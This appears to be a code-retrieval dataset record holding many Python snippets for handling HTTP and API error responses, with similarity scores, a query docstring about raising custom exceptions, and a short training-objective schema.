ValueError: # when response is not in json\n pass\n\n return response", "def query_error(self):\n return self.details[KEY_QUERY_ERROR]", "def raise_on_error(request: requests.Response) -> None:\n if request.status_code >= 400:\n json_res = request.json()\n raise requests.HTTPError(json_res)\n\n return None", "def handle_error(e, error_response_str):\n error_output = e.decode(encoding='UTF-8')\n print_error(error_response_str)\n print_error(error_output)", "def get_errors(self, response: response_domain_model.Response, question_code: str) -> Sequence['ValidationError']:\n ...", "def raise_error(self, err_code, response):\n clsname = str(self.__class__).split('.')[-1].split(\"'\")[0]\n raise ERROR_CODES[err_code](\n 'Response Type: \"%s\"\\tResponse: %s' % (\n clsname, response))", "def odata_error(self, request, environ, start_response, sub_code,\n message='', code=400):\n response_headers = []\n e = core.Error(None)\n e.add_child(core.Code).set_value(sub_code)\n e.add_child(core.Message).set_value(message)\n response_type = self.content_negotiation(\n request, environ, self.ErrorTypes)\n if response_type is None:\n # this is an error response, default to text/plain anyway\n response_type = params.MediaType.from_str(\n 'text/plain; charset=utf-8')\n elif response_type == \"application/atom+xml\":\n # even if you didn't ask for it, you get application/xml in this\n # case\n response_type = \"application/xml\"\n if response_type == \"application/json\":\n data = str(''.join(e.generate_std_error_json()))\n else:\n data = str(e)\n data = data.encode('utf-8')\n response_headers.append((\"Content-Type\", str(response_type)))\n response_headers.append((\"Content-Length\", str(len(data))))\n start_response(\"%i %s\" % (code, sub_code), response_headers)\n return [data]", "def test_response_error(err_msg):\n from server import response_error\n error_text = b'HTTP/1.1 %s' % err_msg\n assert response_error(err_msg).split(b'\\r\\n')[0] == error_text", "def error_file(self) -> 'outputs.FileMetadataResponse':\n return pulumi.get(self, \"error_file\")", "def get_http_error(status_code: int) -> Optional[Type[HTTPError]]:\n return _STATUS_CODE_TO_HTTP_ERRORS.get(status_code)", "def handle_api_error(self, response):\n code = response.status_code\n self.__log(f'Handling API error with status code {code}.', 'error')\n if code == 401:\n self.__log(f'Invalid credentials. Please make sure your token is correct.', 'error')\n raise InvalidCredentialsError\n if code == 404:\n self.__log(f'File not found on query. Make sure query URL is correct and retry.', 'error')\n raise FileNotFoundError\n if code == 422:\n content = json.loads(response.content)\n for error in content['errors']:\n self.__log(f'API could not process the request. Message: {error[\"message\"]}.', 'error')\n raise UnprocessableRequestError(f'Issue with field {error[\"field\"]}: {error[\"message\"]}')\n if code == 429:\n self.__log(f'Monthly request limits exceeded. Upgrade billing or change token.', 'error')\n raise MonthlyRequestLimitExceededError\n self.__log(f'Response for code: \"{code}\" was unhandled by wrapper. 
Sorry to not be more helpful.', 'error')\n raise UnknownApiError(\"An unhandled API exception occurred\")", "def handle_error(self, error):\n html = error.response.content\n raise SystemExit(\"API Error:\\n %s\" %\n \"\\n \".join(html.itertext()))", "def get_error_message_from_razorpay_error(exc: BaseException):\n logger.exception(exc)\n if isinstance(exc, razorpay.errors.BadRequestError):\n return errors.INVALID_REQUEST\n else:\n return errors.SERVER_ERROR", "def check_error(self, response):\n if type(response) is dict and response.has_key('status_code'):\n if response['status_code'] != 200:\n raise rocket.RocketAPIException(response['status_code'],\n response['status_text'])", "def _msg(response):\n try:\n return response.json().get('message')\n except simplejson.scanner.JSONDecodeError:\n return response.text\n except Exception: # pylint: disable=W0703\n return 'Unexpected error.'", "def get_error(self):\n\t\treturn handle_to_object(call_sdk_function('PrlJob_GetError', self.handle))", "def error_handler(response, **kwargs):\n if 400 <= response.status_code <= 499:\n message = response.json()['error_description'] \\\n if 'error_description' in response.json() \\\n else response.json()['error_detail']\n raise ClientError(response, message)\n\n elif 500 <= response.status_code <= 599:\n raise ServerError(response)\n\n return response", "def get_error(self):\n p = self._get_sub_text('error')\n if not p:\n return None\n else:\n try:\n return float(p)\n except ValueError:\n return None", "def print_errors(res, ctx):\n\n if _has_error_code(res):\n return res.get('msg', '')\n return None", "def on_response_validation_error(err):\n return jsonify(message='Bad response'), 500", "def getError(self, status):\r\n nBuffer = 512\r\n msgBuffer = ctypes.create_string_buffer(nBuffer)\r\n # ViStatus status = Acqrs_errorMessage(ViSession instrumentID,\r\n # ViStatus errorCode, ViChar errorMessage[],ViInt32 errorMessageSize);\r\n AgDLL['Acqrs_errorMessage'](self.session, status, msgBuffer,\r\n ViInt32(nBuffer))\r\n return msgBuffer.value", "def _process_error(self, result):\n self.error = result\n if result['errorCode'] == 901:\n raise Exceptions.APIKeyInvalid\n elif result['errorCode'] == 902:\n raise Exceptions.APISecretInvalid\n elif result['errorCode'] == 903:\n raise Exceptions.InvalidRequestToken\n elif result['errorCode'] == 904:\n raise Exceptions.RequestTokenExpired\n elif result['errorCode'] == 905:\n raise Exceptions.InvalidAccessToken\n elif result['errorCode'] == 906:\n raise Exceptions.TokenExpired(self.access.expire)\n elif result['errorCode'] == 907:\n raise Exceptions.ParameterMissing\n elif result['errorCode'] == 908:\n raise Exceptions.ParameterNotFormatted\n elif result['errorCode'] == 909:\n raise Exceptions.FeatureNotSupported\n elif result['errorCode'] == 910:\n raise Exceptions.EndPointNotSupported\n else:\n raise Exceptions.UnknownJsonError(result)", "def _find_errors_in_page(self, response):\n if response.status_code == 403:\n return \"Could not check for errors, as response was a 403 response\\\n forbidden. 
User asking for this url did not have permission.\"\n \n \n errors = re.search('<ul class=\"errorlist\">(.*)</ul>', \n response.content, \n re.IGNORECASE)\n\n if errors: \n #show a little around the actual error to scan for variables that\n # might have caused it\n span = errors.span()\n wide_start = max(span[0]-200,0)\n wide_end = min(span[1]+200,len(response.content)) \n wide_error = response.content[wide_start:wide_end]\n return wide_error\n \n return \"\"", "def _process_error_response(self, toc, buf):\n\n\t\terrorSev = None\n\t\terrorMsg = None\n\t\terrorDet = None\n\n\t\tif toc != 'E' and toc != 'N':\n\t\t\treturn\n\n\t\tparts = buf.split(b'\\0')\n\n\t\tfor part in parts:\n\t\t\tpart = part.decode()\n\t\t\tif len(part) < 1:\n\t\t\t\tcontinue\n\t\t\t_type = part[0]\n\t\t\tif _type == 'M':\n\t\t\t\terrorMsg = part[1:]\n\t\t\telif _type == 'S':\n\t\t\t\terrorSev = part[1:]\n\t\t\telif _type == 'D':\n\t\t\t\terrorDet = part[1:]\n\t\t\n\t\tif not errorSev and not errorMsg:\n\t\t\treturn\n\n\t\tif toc != 'E':\t\t\t\t# This is not an error report it as debug\n\t\t\tif self.Pfdebug:\n\t\t\t\tself.Pfdebug.write(f'BACKEND {errorSev}: {errorMsg}\\n')\n\t\t\t\tif errorDet:\n\t\t\t\t\tself.Pfdebug.write(f'DETAIL: {errorDet}\\n')\n\t\telse:\n\t\t\tif errorDet:\n\t\t\t\tself.pcp_internal_error(f'{errorSev}: {errorMsg}\\nDETAIL: {errorDet}\\n')\n\t\t\telse:\n\t\t\t\tself.pcp_internal_error(f'{errorSev}: {errorMsg}\\n')\n\t\t\tself._setResultStatus(ResultStateType.BACKEND_ERROR)", "def getErrorMessage(self):\n return self._errorMessage", "def error_details(self) -> pulumi.Output[Sequence['outputs.ErrorDetailResponse']]:\n return pulumi.get(self, \"error_details\")", "def from_tornado_error(cls, http_request, http_error):\n response = http_error.response\n return HTTPError(http_request, http_error.code, response=response,\n reason=None if response is None else response.reason)", "def err(self):\n return self._err.getvalue()", "def error_body(self):\n return self._status.error_body", "def get_error_message(self):\n try:\n return api.Api.get_error_message(self._session)\n except exceptions.UnknownException:\n return \"<error message irrecoverable>\"", "def error(self):\n if self.p_err.poll():\n return self.p_err.recv()", "async def _handle_response(response: ClientResponse) -> Dict:\n content = await response.json(encoding='utf-8', loads=loads)\n if response.status != 200:\n for member in JmRpcErrorType:\n if content['message'] != member.value:\n continue\n raise JmRpcError(response.status, content)\n response.raise_for_status()\n return content", "def get_error(self, idx=0):\n return self.portal.error_log.getLogEntries()[idx]", "def raise_for_status(response):\n http_error_msg = \"\"\n\n if 400 <= response.status_code < 500:\n http_error_msg = \"{} Client Error: {}\".format(\n response.status_code, response.reason\n )\n\n elif 500 <= response.status_code < 600:\n http_error_msg = \"{} Server Error: {}\".format(\n response.status_code, response.reason\n )\n\n if http_error_msg:\n try:\n more_info = response.json().get(\"message\")\n except ValueError:\n more_info = None\n if more_info and more_info.lower() != response.reason.lower():\n http_error_msg += \".\\n\\t{}\".format(more_info)\n raise requests.exceptions.HTTPError(http_error_msg, response=response)", "def _get_result_or_raise_error(reply):\n if 'error' in reply:\n e = reply['error']\n raise JadeError(e.get('code'), e.get('message'), e.get('data'))\n\n return reply['result']", "def failure(self, error):\n \n self.request.response.status_int = 
400\n return None", "def handle_error(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def handle_api_error(e):\n return f\"Failed to call Giphy API: {e}\", 500", "def process_error_response(self, resources, resource, api, operation,\n error_response, context):\n pass", "def server_error(err):\n log.error(err)\n return err.msg, 500", "def _handle_api_error(ex):\n if request.path.startswith('/api/'):\n message, detail = str(ex).split(\": \")\n return jsonify(message=message, detail=detail), ex.code\n else:\n return ex", "def http_exception(error):\n data = {'error': str(error)}\n return app.response_class(\n response=json.dumps(data),\n status=error.code,\n mimetype='application/json'\n )", "def _error_check(self, command_response):\n error_list = command_response.find(\"./clierror\")\n command_obj = command_response.find(\"./input\")\n if error_list is not None:\n command = command_obj.text if command_obj is not None else \"Unknown command\"\n msg = etree.tostring(error_list).decode()\n raise NXAPICommandError(command, msg)", "def _extract_openssl_error():\n\n error_num = libcrypto.ERR_get_error()\n buffer = buffer_from_bytes(120)\n libcrypto.ERR_error_string(error_num, buffer)\n\n # Since we are dealing with a string, it is NULL terminated\n error_string = byte_string_from_buffer(buffer)\n\n return _try_decode(error_string)", "def assert_has_valid_error(self, response, expected_code):\r\n assert 'error' in response\r\n assert len(response) == 1\r\n \r\n error = response['error']\r\n assert 'code' in error\r\n assert error['code'] == expected_code\r\n assert 'title' in error\r\n assert isinstance(error['title'], str)\r\n assert 'message' in error\r\n assert isinstance(error['message'], str)", "def parse(response):\n if isinstance(response, dict):\n json = response\n else:\n json = response.json()\n\n if json.get('Error'):\n raise Exception('Error in retrieval: ' + self.json['error'])\n\n return json", "def error():\n return None", "def handle_invalid_usage(error):\n\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def print_requests_httperror(cls, class_name, response):\n print(\n f\"{cls.ERROR_PREFIX} {cls.REQUESTS_PACKAGE_HTTPERROR_MESSAGE} {class_name}/{response.json()['message']}\"\n )", "def _check_status_error(self, res: requests.Response) -> None:\n try:\n if self._raise_exceptions:\n res.raise_for_status()\n if res.status_code > 600:\n raise requests.exceptions.HTTPError(\n u'%s Illegal return code: %s for url: %s' % (res.status_code, res.reason, res.url),\n response=res)\n\n except requests.exceptions.HTTPError as err:\n http_error_msg = str(err.args[0])\n\n if res.content:\n try:\n json_result: dict = res.json()\n message = json_result['error']['message']\n http_error_msg += \": \" + message\n except (json.JSONDecodeError, KeyError):\n if '_TOKEN' not in res.text:\n http_error_msg += \": \" + str(res.text)\n\n raise requests.exceptions.HTTPError(http_error_msg, response=err.response) from err", "def test_parse_error_response(self):\n self.assertEqual(\n parse_server_answer(ERROR_SERVER_RESPONSE),\n f'Bad response. 
{ERROR_SERVER_RESPONSE[RESPONSE]}: {ERROR_SERVER_RESPONSE[ERROR]}'\n )", "def raise_for_status(response):\n if response.status_code != 200:\n res_data = response.json()\n if (response.status_code, res_data['error']) in error_map:\n raise error_map[(response.status_code, res_data['error'])](res_data['error_description'])\n raise ShoperApiError(res_data['error_description'])\n\n return response", "def handle_exception(error):\n return make_response(jsonify({'message': error.description}), 400)", "def response_from_error(error_code, error_message=None):\n\terror = Error(error_code, error_message).__dict__\n\terror_response_code = error['response_code']\n\treturn Response(json.dumps(error), status=error_response_code, mimetype='application/json')", "def errmsg(r):\n return \"%s %s\\n\\n%s\" % (r.status, r.reason, r.raw)", "def from_http_error(cls, e):\n assert isinstance(e, requests.HTTPError), \"Expected 'requests.HTTPError' object\"\n r = e.response\n if r.status_code == 400:\n raise BadRequest(format_exception(e))\n elif r.status_code == 401:\n raise Unauthorized(format_exception(e))\n elif r.status_code == 403:\n raise Forbidden(format_exception(e))\n elif r.status_code == 404:\n raise NotFound(format_exception(e))\n elif r.status_code == 405:\n raise NoMethod(format_exception(e))\n elif r.status_code == 409:\n raise Conflict(format_exception(e))\n elif r.status_code == 411:\n raise LengthRequired(format_exception(e))\n elif r.status_code == 412:\n raise PreconditionFailed(format_exception(e))\n elif r.status_code == 416:\n raise BadRange(format_exception(e))\n elif r.status_code == 500:\n raise InternalServerError(format_exception(e))\n elif r.status_code == 501:\n raise NotImplemented(format_exception(e))\n elif r.status_code == 502:\n raise BadGateway(format_exception(e))\n else:\n logger.error(\n 'Unhandled HTTPError status code {sc} -- {msg}.'.format(sc=r.status_code, msg=format_exception(e)))\n raise InternalServerError(format_exception(e))" ]
[ "0.83358467", "0.78637624", "0.7812136", "0.7469619", "0.74155784", "0.7169605", "0.7166862", "0.7096074", "0.7082572", "0.704426", "0.7022822", "0.69620997", "0.6958218", "0.6933554", "0.6891388", "0.68128866", "0.67896175", "0.67648655", "0.6737759", "0.66620314", "0.6644747", "0.6602933", "0.6565051", "0.6561322", "0.65567136", "0.65312696", "0.652323", "0.6517374", "0.65154064", "0.65154064", "0.65154064", "0.6511031", "0.65085125", "0.65078557", "0.642306", "0.6397883", "0.6384559", "0.6376041", "0.6375979", "0.6374747", "0.6366101", "0.6341838", "0.63188225", "0.63166445", "0.6314802", "0.6305269", "0.6286332", "0.62796545", "0.6276691", "0.6273366", "0.62642217", "0.62532246", "0.6248684", "0.6247443", "0.62471604", "0.62381613", "0.62348413", "0.6225425", "0.6208955", "0.62055606", "0.61830205", "0.61707896", "0.6144279", "0.6141219", "0.61365306", "0.61361533", "0.6130442", "0.61265075", "0.6122625", "0.61191934", "0.6118967", "0.6116601", "0.6112908", "0.610606", "0.61053723", "0.61021423", "0.60974467", "0.60862195", "0.6076746", "0.60765535", "0.6072424", "0.6071711", "0.6070438", "0.6069037", "0.6068615", "0.60603976", "0.6059087", "0.60518205", "0.60474616", "0.6046218", "0.6045707", "0.6045707", "0.60435414", "0.6029339", "0.6026453", "0.60255975", "0.6017013", "0.6016416", "0.6008656", "0.60062015" ]
0.6469981
34
Wrapper for throwing custom exceptions. When, for example, the server responds with 200, and errors are passed inside json.
def error_handling( self, tapi_exception, error_message, repeat_number, response, request_kwargs, api_params, **kwargs ): raise tapi_exception
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_json_error(ex):\n if isinstance(ex, HTTPException):\n return ex;\n elif isinstance(ex, ResourceException):\n info = ex.to_dict()\n status_code = ex.http_status\n info[\"type\"] = \"exception\"\n else:\n message = \"There was an internal server error. Please try again later.\"\n info = {\"code\": \"internal_server_error\", \"message\": message, \"type\": \"exception\"}\n status_code = 500\n # generally we should log these 500 errors with the stacktrace somewhere -- we used splunk at Box.\n\n response = jsonify(**info)\n response.status_code = status_code\n return response", "def http_exception(error):\n data = {'error': str(error)}\n return app.response_class(\n response=json.dumps(data),\n status=error.code,\n mimetype='application/json'\n )", "def handle_exception(error):\n return make_response(jsonify({'message': error.description}), 400)", "def _raise_http_error(self, *args, **kwargs):", "def exception_handler(exc):\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['X-Throttle-Wait-Seconds'] = '%d' % exc.wait\n\n return Response({'error_code': CustomSerializer.get_api_code(exc.detail),\n 'error_message': exc.detail,\n 'errors': []},\n status=exc.status_code,\n headers=headers)\n\n elif isinstance(exc, Http404):\n return Response({'error_code': CustomSerializer.get_api_code('Not found'),\n 'error_message': 'Not found',\n 'errors': []},\n status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n return Response({'error_code': CustomSerializer.get_api_code('You do not have permission to perform this action.'),\n 'error_message': 'You do not have permission to perform this action.',\n 'errors': []},\n status=status.HTTP_403_FORBIDDEN)\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def handle_error(self, err): # pragma: no cover\n # log every exception raised in the application\n print('we ended up in the API handle_error()', err, err.__class__)\n\n # catch other HTTP errors\n if isinstance(err, HTTPException):\n original = getattr(err, \"original_exception\", None)\n return jsonify({\n 'success': False,\n 'error': err.code,\n \"message\": getattr(err.error, 'message')\n }), err.code\n\n # if 'message' attribute isn't set, assume it's a core Python exception\n if not getattr(err, 'message', None):\n original = getattr(err, \"original_exception\", None)\n return jsonify({\n 'message': 'Server has encountered an unknown error'\n }), 500\n\n # Handle application-specific custom exceptions\n return jsonify(**err.kwargs), err.http_status_code", "def error(\n status=500,\n message=\"Internal Server Error\"\n):\n return make_response(\n jsonify(error=message),\n status,\n )", "def catch_exception(func):\n def wrapper(*args, **kwargs):\n try:\n ret_val = func(*args, **kwargs)\n return ret_val\n except Exception as err:\n logger.exception(\"func name: %s, error: %s\" % (func.__name__, err))\n result = {\"code\": -20001, \"msg\": str(err)}\n return JsonResponse(result)\n return wrapper", "def error_handler(response, **kwargs):\n if 400 <= response.status_code <= 499:\n message = response.json()['error_description'] \\\n if 'error_description' in response.json() \\\n else response.json()['error_detail']\n raise ClientError(response, message)\n\n elif 500 <= response.status_code <= 599:\n raise ServerError(response)\n\n return response", "def jsonify_exception(error: HTTPException) -> Response:\n 
exc_resp = error.get_response()\n response: Response = jsonify(reason=error.description)\n response.status_code = exc_resp.status_code\n return response", "def helper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except (requests.exceptions.RequestException,\n json.JSONDecodeError,\n simplejson.scanner.JSONDecodeError) as err:\n return handle_specific_exception(err)\n except TypeError as err:\n success = False\n return RestReturn(success=success, message=err.args[0])", "def raise_on_error(request: requests.Response) -> None:\n if request.status_code >= 400:\n json_res = request.json()\n raise requests.HTTPError(json_res)\n\n return None", "def handle_uncaught_error(e):\n status_code = 500\n\n result = {\n \"error_message\": \"Unknown or unexpected error.\",\n \"error_code\": \"INTERNAL_SERVER_ERROR\"\n }\n return jsonify(result), status_code", "def handle_api_exception(error):\n response = flask.jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def generic_exception_handler( exc, context ):\n # Call REST framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler( exc, context )\n\n if isinstance( exc, Http_error ):\n response = Response( exc.context, status=exc.status_code )\n set_rollback()\n\n return response", "def _writeJSONErrorResponse(f, request):\n code = getattr(f.value, 'code', CODE.UNKNOWN)\n _writeJSONResponse(\n result=f.getErrorMessage().decode('ascii'),\n request=request,\n code=code,\n status=_mapErrorCodeToStatus(code))\n raise f", "def exception_handler(res):\n try:\n res_data = res.json()\n error_code = res_data['status']\n error_msg = build_error_msg(res_data['errors'])\n exception = DemistoException(ERROR_TITLES.get(error_code, '') + error_msg)\n\n except Exception:\n exception = DemistoException(f'Error in API call [{res.status_code}] - {res.reason}')\n\n raise exception", "def from_http_error(cls, e):\n assert isinstance(e, requests.HTTPError), \"Expected 'requests.HTTPError' object\"\n r = e.response\n if r.status_code == 400:\n raise BadRequest(format_exception(e))\n elif r.status_code == 401:\n raise Unauthorized(format_exception(e))\n elif r.status_code == 403:\n raise Forbidden(format_exception(e))\n elif r.status_code == 404:\n raise NotFound(format_exception(e))\n elif r.status_code == 405:\n raise NoMethod(format_exception(e))\n elif r.status_code == 409:\n raise Conflict(format_exception(e))\n elif r.status_code == 411:\n raise LengthRequired(format_exception(e))\n elif r.status_code == 412:\n raise PreconditionFailed(format_exception(e))\n elif r.status_code == 416:\n raise BadRange(format_exception(e))\n elif r.status_code == 500:\n raise InternalServerError(format_exception(e))\n elif r.status_code == 501:\n raise NotImplemented(format_exception(e))\n elif r.status_code == 502:\n raise BadGateway(format_exception(e))\n else:\n logger.error(\n 'Unhandled HTTPError status code {sc} -- {msg}.'.format(sc=r.status_code, msg=format_exception(e)))\n raise InternalServerError(format_exception(e))", "def handle_unknown_errors(exc):\n return jsonify(dict(\n traceback=traceback.format_exc(),\n message=str(exc),\n )), 500", "def generic_errors(error, code):\n errors = {}\n errors[\"error\"] = error\n response = jsonify(errors)\n response.status_code = code\n return response", "def process_exception(self, request, exception):\n logging.error(\"ERROR\")\n logging.error(traceback.format_exc())\n response = set_response(\"Internal server error\", False, 500, {})\n 
return JsonResponse(response, status=response[\"http_code\"])", "def _catch_error(f):\n @wraps(f) \n def wrap(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except Exception as e:\n raise HTTPBadRequest(reason=e)\n return wrap", "def response_error(error, status=400):\n\n response = {\n 'status': 'failed',\n 'error': error\n }\n\n return response_json(response, status=400)", "def handle_errors(func):\n def wrapper(*args, **kwargs):\n try:\n response = func(*args, **kwargs)\n except Exception as e:\n response = jsonify({\"success\": False, \"message\": str(e)})\n return response\n wrapper.func_name = func.func_name\n return wrapper", "def raise_for_status(response):\n if response.status_code != 200:\n res_data = response.json()\n if (response.status_code, res_data['error']) in error_map:\n raise error_map[(response.status_code, res_data['error'])](res_data['error_description'])\n raise ShoperApiError(res_data['error_description'])\n\n return response", "def _catch_error(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except Exception as e:\n raise HTTPBadRequest(reason=e)\n return wrap", "def throw_error(self, error, status_code=400, **extra):\n data = dict(success=False, data=dict(message=error, **extra))\n raise ShortCircuitHttpChain(response=JsonResponse(data, status=status_code))", "def raise_best_exception(self, json_response):\n exceptions = {\n 206: CannotParseError,\n 400: BadRequestError,\n 401: NotAuthorizedError,\n 403: ForbiddenError,\n 404: NotFoundError,\n 500: ServerError,\n 503: UnavailableError,\n }\n try:\n err = json_response['response']['error']\n raise exceptions[err['code']](err['code'],err['message'])\n except IndexError:\n raise UnexpectedError('','Unexpected error.')", "def jsonify(func):\n\n @functools.wraps(func)\n def convert(*args, **kwargs):\n\n success = True\n code = 200 # default status code - success!\n\n try:\n result = func(*args, **kwargs)\n\n if isinstance(result, BaseResponse):\n return result\n\n except exc.HTTPException as ex:\n # i'd like to be able to just re-raise e here, but the body of the\n # response is e.get_body() instead of e.description - so we have to\n # just set up the response ourselves\n result = { 'message' : ex.description }\n code = ex.code\n\n except Exception as ex:\n result = { 'message' : 'Internal Server Error', 'system_message' : ex.message }\n code = 500\n\n # build a response object, and change the content type header to json\n response = make_response(json.dumps(result))\n response.headers['Content-Type'] = 'application/json'\n response.status_code = code\n\n return response\n\n # return the function that is taking the place of (or masquerading as) our decorated function\n return convert", "def bad_request(self, error):\n return jsonify({'error': 'BAD REQUEST'}), 400", "def httperror( status_code=500, message=b'' ):", "def json_error(message):\n return json_response(isError=True, message=message)", "def exceptions(e):\n # NOTE: add log entry\n str(getattr(e, \"code\", \"unavailable\"))\n log_error_code = str(getattr(e, \"code\", \"unavailable\"))\n service_log.error(\n f\"{request.remote_addr} {request.method} {request.scheme} {request.full_path}\\n\"\n f\"Error code: {log_error_code}\\n\"\n f\"Stack trace: {traceback.format_exc()}\"\n )\n\n # NOTE: craft user messages\n if hasattr(e, \"code\"):\n code = int(e.code)\n\n # NOTE: return an http error for methods with no body allowed. 
This prevents undesired exceptions.\n NO_PAYLOAD_METHODS = \"HEAD\"\n if request.method in NO_PAYLOAD_METHODS:\n return Response(status=code)\n\n error: ServiceError\n if code == 400:\n error = ProgramHttpRequestError(e)\n elif code == 404:\n error = ProgramHttpMissingError(e)\n elif code == 405:\n error = ProgramHttpMethodError(e)\n elif code == 408:\n error = ProgramHttpTimeoutError(e)\n else:\n error = ProgramHttpServerError(e, code)\n\n return error_response(error)\n\n # NOTE: Werkzeug exceptions should be covered above, the following line is for\n # unexpected HTTP server errors.\n return error_response(e)", "def return_json_error(msg, status_code):\n return Response(response=json.dumps({'message': str(msg)}), status=status_code, mimetype=\"application/json\")", "def error_return(content, status):\n content = '{' + '\"status\":{},\"message\":\"{}\"'.format(status, content) + '}'\n return Response(content, status=status, mimetype='application/json')", "def response_json_error_info(func):\n\n def wrapper(req):\n try:\n return func(req)\n except Exception as ex:\n return get_json_response({\n \"status\": \"error\",\n \"error_info\": str(ex),\n \"trace_back\": traceback.format_exc()\n })\n\n return wrapper", "def response_json_error_info(func):\n def wrapper(request):\n try:\n return func(request)\n except Exception as ex:\n return get_json_response({\n \"status\": \"error\",\n \"error_info\": str(ex),\n \"trace_back\": traceback.format_exc()\n })\n\n return wrapper", "def common_exceptions_400(func):\r\n def wrapped(request, *args, **kwargs): # pylint: disable=C0111\r\n use_json = (request.is_ajax() or\r\n request.META.get(\"HTTP_ACCEPT\", \"\").startswith(\"application/json\"))\r\n try:\r\n return func(request, *args, **kwargs)\r\n except User.DoesNotExist:\r\n message = _(\"User does not exist.\")\r\n if use_json:\r\n return JsonResponse({\"error\": message}, 400)\r\n else:\r\n return HttpResponseBadRequest(message)\r\n except AlreadyRunningError:\r\n message = _(\"Task is already running.\")\r\n if use_json:\r\n return JsonResponse({\"error\": message}, 400)\r\n else:\r\n return HttpResponseBadRequest(message)\r\n return wrapped", "def _handle_api_error(ex):\n if request.path.startswith('/api/'):\n message, detail = str(ex).split(\": \")\n return jsonify(message=message, detail=detail), ex.code\n else:\n return ex", "def application_error(e):\n message = {\n 'status': 500,\n 'message': 'Sorry, unexpected error: ' + format(e)\n }\n resp = jsonify(message)\n resp.status_code = 500\n\n return resp", "def on_response_validation_error(err):\n return jsonify(message='Bad response'), 500", "def custom_exception_handler(exc, context):\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n # Use the manually set message if it exists.\n if hasattr(exc, \"message\"):\n message = exc.message or ''\n # Otherwise construct the message from the details.\n else:\n message = ''\n for key in exc.detail:\n try:\n if isinstance(exc.detail[key], str):\n message += exc.detail[key] + ' '\n else:\n for error in exc.detail[key]:\n # Exclude duplicates.\n if error not in message:\n message += error + ' '\n except TypeError:\n if key == 'non_field_errors':\n message = exc.detail[key][0]\n else:\n message = _('Invalid request.')\n\n # Remove trailing whitespace.\n if message.endswith(' '):\n 
message = message[:-1]\n\n data = OrderedDict([\n ('status', 'error'), ('message', message), ('data', exc.detail)\n ])\n else:\n data = OrderedDict([('status', 'error'), ('message', exc.detail)])\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n elif isinstance(exc, Http404):\n msg = _('Not found.')\n data = {'status': 'error', 'message': msg}\n\n set_rollback()\n return Response(data, status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n msg = _('Permission denied.')\n data = {'status': 'error', 'message': msg}\n\n set_rollback()\n return Response(data, status=status.HTTP_403_FORBIDDEN)\n\n elif isinstance(exc, DjangoBaseException):\n data = {'status': 'error', 'message': exc.default_detail}\n\n set_rollback()\n return Response(data, status=exc.status_code)\n\n # If debug is false return a formatted error and raise an internal error.\n if not settings.DEBUG:\n logger.exception(exc)\n exc = DjangoBaseException()\n return Response(\n {'status': 'error', 'message': exc.default_detail},\n status=exc.status_code\n )\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n\n return Response(\n str(exc),\n status=response.status_code if response is not None else HTTP_500_INTERNAL_SERVER_ERROR,\n )", "def make_error(status_code, message, sub_code=None, action=None, **kwargs):\n data = {\n 'status': status_code,\n 'message': message,\n }\n if action:\n data['action'] = action\n if sub_code:\n data['sub_code'] = sub_code\n data.update(kwargs)\n response = jsonify(data)\n response.status_code = status_code\n return response", "def known_exceptions(func):\n def helper(*args, **kwargs):\n \"\"\"Actual Decorator for handling known exceptions\"\"\"\n try:\n return func(*args, **kwargs)\n except (requests.exceptions.RequestException,\n json.JSONDecodeError,\n simplejson.scanner.JSONDecodeError) as err:\n return handle_specific_exception(err)\n except TypeError as err:\n success = False\n return RestReturn(success=success, message=err.args[0])\n return helper", "def exception_handler(exc, context):\n if isinstance(exc, NotFoundException):\n exc = exceptions.NotFound()\n elif isinstance(exc, UnauthorizedException):\n exc = exceptions.PermissionDenied()\n elif isinstance(exc, exceptions.NotAuthenticated):\n exc = NotAuthenticated()\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n data = exc.detail\n else:\n data = {'detail': exc.detail}\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n return None", "def return_error(self, status, payload=None):\n resp = None\n if payload is not None:\n payload = json.dumps(payload)\n resp = self.make_response(payload, status=status)\n\n if status in [405]:\n abort(status)\n else:\n abort(status, response=resp)", "def _rest_error(self, status_code, error_code, message):\n return {\"status_code\": status_code, \"error_code\": error_code, \"message\": message}", "def exception_handler(exc, context):\n headers = None\n if isinstance(exc, APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n data = 
